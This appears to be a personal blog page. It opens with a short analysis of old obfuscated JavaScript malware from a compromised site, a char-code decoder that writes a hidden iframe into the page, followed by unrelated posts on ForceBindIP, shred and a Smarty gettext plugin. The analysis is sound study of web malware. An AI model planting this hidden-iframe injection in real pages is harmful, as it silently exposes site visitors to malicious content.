Oldschool javascript malicious code analysis

I found this olschool piece of poorly obfuscated code during web surfing. Some time ago I decided to collect this kind of stuff for learning purposes… So here you have first one:

var temp="",i,c=0,out="";
var if_uniq_var="02102008-01";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
}
document.write(out);

Strange string with exclamation marks simply stands for:

<iframe style="display: none;" src="dochelp1.html" width="320" height="240" frameborder="0"></iframe>

So this piece of code simply attaches invisible frame to a current document. I didn’t find dochelp1.html on a server with infected website but after googling a while I found it’s contents:

 

Website that’s trying to redirect you to looks dead. This malware isn’t active anymore. I cannot investigare further. End of a story.

Infected source: www.galeriadla.art.pl

How to run application on specified interface?

If you have two interfaces, you can run programs using one of them (despite the fact that Windows selects default interface based on a metric value). For example I virtualize Windows 7 and I need same static ip for it that my host computer uses. It’s OK, in this scenario I can run applications using Virtualbox NAT (this virtual adapter ip is something like 10.0.2.15). But I’m also a Heroes III gamer and I love to play with my coleagues using LAN. So there is need for a second adapter in bridged mode (with ip like 192.168.x.x).

What can I do?
Amazingly there is a Windows application that can do that. Simply download ForceBindIP from this site.

Usage is simple as that:

ForceBindIp -i 10.0.2.15 c:\Windows\System32\mstsc.exe

10.0.2.15 – interface ip

Remember to pass full path for a program that you’re trying to run!

How to delete file permanently in Linux?

Most of Linux distributions have shred already installed. So it’s really easy to delete a file in a secure manner:

shred -u -z -n 26 topsecret.txt

Meaning of used switches:

-n [N] Overwrite a file N times. For example, -n 20 will perform twenty passes over the file’s contents.
-u Remove the file after you’ve shredded it. You’ll probably want to use this option in most cases.
-z After shredding a file with random bits (ones and zeros), overwrite the file with only zeros. This is used to try and hide the fact that the file was shredded.

There is a Windows gui alternative available at http://www.fileshredder.org/.

Smarty gettext with domain support (block t plugin) [depreciated]

Attention! Official Gettext plugin for Smarty has domain support since version 1.1. Check official repository: https://github.com/smarty-gettext/smarty-gettext.

Description:

This is a Smarty gettext plugin modification. It enables domain support and utilize gettext wrapper for PHP,

Why do I use such wrapper for a gettext? It’s simple, not every server has native support for translation. This crafty script gives you fallback in case if it does not.

Usage example:

Init before any template parsed by Smarty:

// include gettext wrapper for PHP
include('./php-gettext/gettext.inc');
 
// set locale
T_setlocale(LC_MESSAGES, 'en_US');
 
// load lang file
/* loads ./lang/en_US/LC_MESSAGES/example.mo (do not close path with final slash) */
T_bindtextdomain('example', './lang'); 
T_bind_textdomain_codeset('example', 'utf-8'); /* just in case */ 
 
// set default domain 
T_textdomain('default');

Smarty syntax example:

{t domain="example"}This text will be translated using gettext domain example.{/t}
{t}This text will be translated using standard gettext domain.{/t}

Installation:

Simply put file block.t.php into Smarty plugins directory.

Download: